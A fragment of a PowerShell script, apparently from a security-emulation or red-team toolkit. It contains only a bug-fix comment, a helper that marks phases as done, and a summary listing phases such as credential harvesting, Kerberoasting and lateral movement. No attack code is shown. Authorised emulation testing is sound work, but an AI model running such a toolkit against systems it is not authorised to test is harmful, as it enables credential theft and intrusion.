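# the main block: previously Phase 2 was always marked and Phases 3/4 were marked
# from the -Skip switch alone, so the summary claimed phases that never ran
# (non-domain-joined target, "no" at the prompt, or an error part-way through).
function Get-PhaseMark {
    # Returns the checkbox text for one phase: [X] when a result exists, else [ ].
    param($PhaseResult)
    if ($null -ne $PhaseResult) { "[X]" } else { "[ ]" }
}
$summary = @"
======================================
SECURITY EMULATION SUMMARY
======================================
Target Computer: $TargetComputer
Execution Time: $(Get-Date)
Output Path: $OutputPath
PHASES EXECUTED:
$(Get-PhaseMark $reconResults) Phase 1: Initial Reconnaissance
$(Get-PhaseMark $adResults) Phase 2: Active Directory Enumeration
$(Get-PhaseMark $credResults) Phase 3: Credential Harvesting
$(Get-PhaseMark $kerbResults) Phase 4: Kerberoasting
$(Get-PhaseMark $lateralResults) Phase 5: Lateral Movement Testing
$(Get-PhaseMark $lolbinResults) Phase 6: LOLBIN/LOLBAS Techniques
All results have been saved as JSON files in:
$OutputPath
Review the log file for detailed execution information:
$logFile
======================================
"@
Write-Host $summary
$summary | Out-File (Join-Path $OutputPath "execution_summary_$timestamp.txt")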